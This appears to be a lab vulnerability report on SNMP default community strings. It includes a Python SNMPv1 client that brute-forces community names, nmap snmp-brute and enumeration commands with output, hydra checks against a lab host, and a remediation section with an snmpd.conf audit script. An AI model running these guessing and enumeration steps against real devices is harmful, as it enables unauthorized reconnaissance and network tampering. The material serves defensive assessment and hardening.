1. Vulnerability Report
2. Vulnerability Description
SNMP stands for Simple Network Management Protocol. It is an application-layer protocol of the TCP/IP suite; the agent listens on UDP port 161 (traps go to UDP 162 on the manager), and it is used to monitor a target device's operating system, hardware, services and applications, software and hardware configuration, network protocol state, performance and resource utilisation, error events, application status and similar information. There are three versions: SNMPv1 (authenticated only by a community name), SNMPv2c (the same community model as v1, with more error codes and bulk retrieval) and SNMPv3 (the User-based Security Model, with real authentication and optional encryption). Because the protocol is simple to implement and rides on TCP/IP, nearly every vendor supports it in firewalls, routers, switches, bridges and servers. In v1 and v2c, however, the community name is the only credential, it travels in cleartext in every packet, and many devices ship with the well-known defaults "public" (read) and "private" (read-write). An attacker who knows or guesses the read community can remotely read device and network information; one who obtains the write community can change configuration through SNMP SET requests and use that to attack or disrupt the network.
3. Impact
In remote network management, SNMP agents commonly ship with "public" and "private" as the default community names, mapped to read and read-write access respectively. These defaults are a security weakness: an attacker can use them to collect detailed information about the remote host or, with the write community, to tamper with the internal network.
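To make the weakness concrete, the following SNMPv1 codec, added here as an example and not code from the page, builds the GetRequest that nmap and hydra send, decodes the agent's reply, and loops over candidate community names the way snmp-brute does. It implements only the BER subset SNMPv1 needs; the `SYS_DESCR_0` OID, the target host and the 2-second timeout are assumptions for the example, and the reply it can decode offline is constructed rather than captured.

```python
"""SNMPv1 GetRequest/GetResponse codec (added example, not code from the page). The community
name is one cleartext OCTET STRING in every datagram; a v1 agent compares it and stays silent on
mismatch, so snmp-brute and hydra just resend the same GetRequest with a different name."""
import socket

SYS_DESCR_0 = "1.3.6.1.2.1.1.1.0"        # sysDescr.0, the OID nmap's snmp-sysdescr reads
GET_REQUEST, GET_RESPONSE = 0xA0, 0xA2   # context-specific PDU tags

def _length(n: int) -> bytes:
    if n < 0x80:                         # short form
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body   # long form: 0x80|N then N length bytes

def _tlv(tag: int, content: bytes) -> bytes:
    return bytes([tag]) + _length(len(content)) + content

def encode_int(value: int) -> bytes:
    """INTEGER, minimal two's complement (non-negative); a leading 0x00 keeps the sign bit clear."""
    return _tlv(0x02, value.to_bytes(max(1, (value.bit_length() + 8) // 8), "big"))

def encode_octets(value: bytes) -> bytes:
    return _tlv(0x04, value)

def encode_oid(oid: str) -> bytes:
    """OBJECT IDENTIFIER: first two arcs packed as 40*a+b, the rest base-128 with continuation bits."""
    arcs = [int(a) for a in oid.strip(".").split(".")]
    body = bytearray([arcs[0] * 40 + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        body.extend(reversed(chunk))
    return _tlv(0x06, bytes(body))

def encode_sequence(*items: bytes, tag: int = 0x30) -> bytes:
    return _tlv(tag, b"".join(items))

def build_v1_message(community: str, pdu_tag: int, varbinds, request_id: int = 1) -> bytes:
    """Message ::= SEQUENCE { version 0, community, PDU { req-id, err-status, err-index, varbinds } }"""
    vbl = encode_sequence(*(encode_sequence(encode_oid(o), v) for o, v in varbinds))
    pdu = encode_sequence(encode_int(request_id), encode_int(0), encode_int(0), vbl, tag=pdu_tag)
    return encode_sequence(encode_int(0), encode_octets(community.encode()), pdu)

def build_v1_get(community: str, oid: str, request_id: int = 1) -> bytes:
    """GetRequest for one OID; the value slot is ASN.1 NULL (05 00) until the agent fills it."""
    return build_v1_message(community, GET_REQUEST, [(oid, b"\x05\x00")], request_id)

def _read_tlv(buf: bytes, pos: int):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                    # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def decode_oid(body: bytes) -> str:
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))

def parse_v1_message(datagram: bytes) -> dict:
    """Decode a v1 datagram into version, community, PDU type, request-id, error-status and varbinds."""
    _, msg, _ = _read_tlv(datagram, 0)
    _, version, pos = _read_tlv(msg, 0)
    _, community, pos = _read_tlv(msg, pos)   # cleartext: anyone on the path can read it
    pdu_tag, pdu, _ = _read_tlv(msg, pos)
    _, req_id, pos = _read_tlv(pdu, 0)
    _, err_status, pos = _read_tlv(pdu, pos)
    _, _err_index, pos = _read_tlv(pdu, pos)
    _, vbl, _ = _read_tlv(pdu, pos)
    varbinds, pos = [], 0
    while pos < len(vbl):
        _, vb, pos = _read_tlv(vbl, pos)
        _, oid_body, vpos = _read_tlv(vb, 0)
        vtag, value, _ = _read_tlv(vb, vpos)
        varbinds.append((decode_oid(oid_body), vtag, value))
    return {"version": int.from_bytes(version, "big"), "community": community.decode(errors="replace"),
            "pdu_type": pdu_tag, "request_id": int.from_bytes(req_id, "big"),
            "error_status": int.from_bytes(err_status, "big"), "varbinds": varbinds}

def snmp_get(host: str, community: str, oid: str = SYS_DESCR_0, timeout: float = 2.0):
    """One live v1 GET over UDP/161; a wrong community gets no reply, so the timeout is the verdict."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_v1_get(community, oid), (host, 161))
        data, _ = sock.recvfrom(65535)
    except socket.timeout:
        return None
    finally:
        sock.close()
    return parse_v1_message(data)

def check_communities(host: str, candidates=("public", "private")) -> dict:
    """The whole 'brute force' snmp-brute and hydra run: the same GetRequest, one community per try."""
    return {c: snmp_get(host, c) is not None for c in candidates}
```

`parse_v1_message(build_v1_get("public", SYS_DESCR_0))` shows the community as the second field of the message, which is why a passive capture of UDP/161 traffic recovers it with no guessing at all; `check_communities("192.168.43.58")` against the lab host of this report reproduces the snmp-brute result. Because a v1 agent answers a wrong community with silence rather than an error, a brute-forcer has to wait out the timeout for each miss, which is also why these tools rate-limit poorly on lossy links.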
4. Detection and Exploitation with Nmap
## Detection
λ nmap -sU -sV -Pn -p 161 --script="snmp-brute" 192.168.43.58
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-brute:
| public - Valid credentials
|_ private - Valid credentials
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 99e37402dc755153
| snmpEngineBoots: 33
|_ snmpEngineTime: 2h37m13s
## Exploitation
## Enumerate running processes over SNMP
nmap -sU -sV -Pn -p 161 --script="snmp-processes" 192.168.43.58
## Extract system information (sysDescr) from an SNMPv1 service
nmap -sU -sV -Pn -p 161 --script="snmp-sysdescr" 192.168.43.58
## Query SNMP for netstat-like output
nmap -sU -sV -Pn -p 161 --script="snmp-netstat" 192.168.43.58
## Enumerate network interfaces over SNMP
λ nmap -sU -sV -Pn -p 161 --script="snmp-interfaces" 192.168.43.58
PORT STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 99e37402dc755153
| snmpEngineBoots: 33
|_ snmpEngineTime: 3h09m12s
| snmp-interfaces:
| lo
| IP address: 127.0.0.1 Netmask: 255.0.0.0
| Type: softwareLoopback Speed: 10 Mbps
| Status: up
| Traffic stats: 14.70 Kb sent, 14.70 Kb received
| eth0
| IP address: 192.168.43.58 Netmask: 255.255.255.0
| MAC address: 00:0c:29:3e:ba:70
| Type: ethernetCsmacd Speed: 10 Mbps
| Status: up
|_ Traffic stats: 4.48 Mb sent, 4.13 Mb received
5. Remediation
Edit /etc/snmp/snmpd.conf, replace the community `public` (and `private`) with a string of adequate length and mixed character classes such as Admin123..., save, and restart the SNMP service. Note that the `source` column of the `com2sec` lines is left at `default` here, so the new community is still accepted from any address; restricting it to the management host or subnet, dropping the read-write mapping unless it is actually used, or moving to SNMPv3 with authentication and privacy removes the remaining exposure to network-wide guessing and sniffing.
C:\root\Desktop> cat /etc/snmp/snmpd.conf | grep Admin123... -A 2 -B 2
# sec.name source community
#com2sec paranoid default public
com2sec readonly default Admin123...
com2sec readwrite default Admin123....
####
C:\root\Desktop> /etc/init.d/snmpd restart
Restarting network management services: snmpd.
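Before trusting the restart, it is worth checking the whole file rather than one grep, because the `source` column matters as much as the community. The audit below is an added example, not part of this page or of net-snmp: it parses the com2sec/group/access chain and the rocommunity/rwcommunity shortcuts as documented in snmpd.conf(5), and flags the two default names, short or single-class strings, and any community accepted from `default`. The before/after configs embedded in it are constructed to mirror this section; the group and access lines are assumed (the page shows only the com2sec lines) and the 8-character minimum is a policy choice for the example.

```python
"""Audit a net-snmp snmpd.conf for default or weak v1/v2c communities and wide-open
sources (added example, not from the page). Directive syntax assumed from snmpd.conf(5):
  rocommunity|rwcommunity COMMUNITY [SOURCE [OID | -V VIEW]]
  com2sec [-Cn CTX] SECNAME SOURCE COMMUNITY
  group GROUP MODEL SECNAME
  access GROUP CTX MODEL LEVEL PREFIX READ WRITE NOTIFY"""
import re

DEFAULT_COMMUNITIES = {"public", "private"}      # the two values the scan above recovered
ANY_SOURCE = {"default", "0.0.0.0/0", "::/0"}    # accepted from every address
MIN_LENGTH = 8                                   # policy threshold chosen for this example

def weak_community(community: str) -> bool:
    """Default, shorter than MIN_LENGTH, or drawn from a single character class."""
    classes = sum(bool(re.search(p, community)) for p in (r"[a-z]", r"[A-Z]", r"\d", r"[^A-Za-z0-9]"))
    return community.lower() in DEFAULT_COMMUNITIES or len(community) < MIN_LENGTH or classes < 2

def _check(lineno: int, community: str, source: str, writable: bool) -> list:
    mode = "rw" if writable else "ro"
    out = []
    if community.lower() in DEFAULT_COMMUNITIES:
        out.append((lineno, "default-community", f"{mode} community {community!r} is a vendor default"))
    elif weak_community(community):
        out.append((lineno, "weak-community", f"{mode} community {community!r} is short or single-class"))
    if source in ANY_SOURCE:
        kind = "write-from-anywhere" if writable else "read-from-anywhere"
        out.append((lineno, kind, f"{mode} community accepted from source {source!r}"))
    return out

def audit_snmpd_conf(text: str) -> list:
    """Return (line, finding-kind, message) tuples; an empty list means nothing was flagged."""
    findings, com2sec, sec2group, group_writes = [], [], {}, {}
    for lineno, raw in enumerate(text.splitlines(), 1):
        tok = raw.split("#", 1)[0].split()           # drop comments, tokenise
        if not tok:
            continue
        directive = tok[0].lower()
        if directive in ("rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6") and len(tok) >= 2:
            source = tok[2] if len(tok) >= 3 and not tok[2].startswith("-") else "default"
            findings += _check(lineno, tok[1], source, directive.startswith("rw"))
        elif directive == "com2sec":
            args = tok[3:] if len(tok) > 1 and tok[1] == "-Cn" else tok[1:]
            if len(args) >= 3:                        # SECNAME SOURCE COMMUNITY
                com2sec.append((lineno, args[0], args[1], args[2]))
        elif directive == "group" and len(tok) >= 4:
            sec2group[tok[3]] = tok[1]
        elif directive == "access" and len(tok) >= 8:
            group_writes[tok[1]] = tok[7].lower() != "none"   # WRITE view column
    for lineno, secname, source, community in com2sec:        # com2sec -> group -> write view
        writable = group_writes.get(sec2group.get(secname), False)
        findings += _check(lineno, community, source, writable)
    return findings

# Constructed configs mirroring the page's before/after. The group/access lines are the usual
# net-snmp mapping and are assumed here; the page shows only the com2sec lines.
BEFORE_CONF = """\
# sec.name source community
com2sec readonly default public
com2sec readwrite default private
group ROGroup v1 readonly
group RWGroup v1 readwrite
access ROGroup "" any noauth exact all none none
access RWGroup "" any noauth exact all all none
"""

AFTER_CONF = """\
com2sec readonly 192.168.43.0/24 Admin123...
com2sec readwrite 192.168.43.1 Rw-Str0ng-C0mmunity!
group ROGroup v1 readonly
group RWGroup v1 readwrite
access ROGroup "" any noauth exact all none none
access RWGroup "" any noauth exact all all none
"""

if __name__ == "__main__":
    for name, conf in (("before", BEFORE_CONF), ("after", AFTER_CONF)):
        print(name, audit_snmpd_conf(conf) or "clean")
```

Run it against the live file with `audit_snmpd_conf(open("/etc/snmp/snmpd.conf").read())`. Against the remediated lines shown above it still reports that both communities are accepted from any source, because `source` was left at `default`; only the constructed AFTER_CONF, which pins each community to a management address, comes back clean.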
Verify with the hydra brute-force tool on Kali
## Login attempt with the original string fails
C:\root\Desktop> hydra -p public -s 161 192.168.43.58 snmp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-19 17:23:18
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking snmp://192.168.43.58:161/
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-19 17:23:26
## Login attempt with the new string succeeds
C:\root\Desktop> hydra -p Admin123... -s 161 192.168.43.58 snmp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-19 17:23:07
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking snmp://192.168.43.58:161/
[161][snmp] host: 192.168.43.58 password: Admin123...
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-19 17:23:07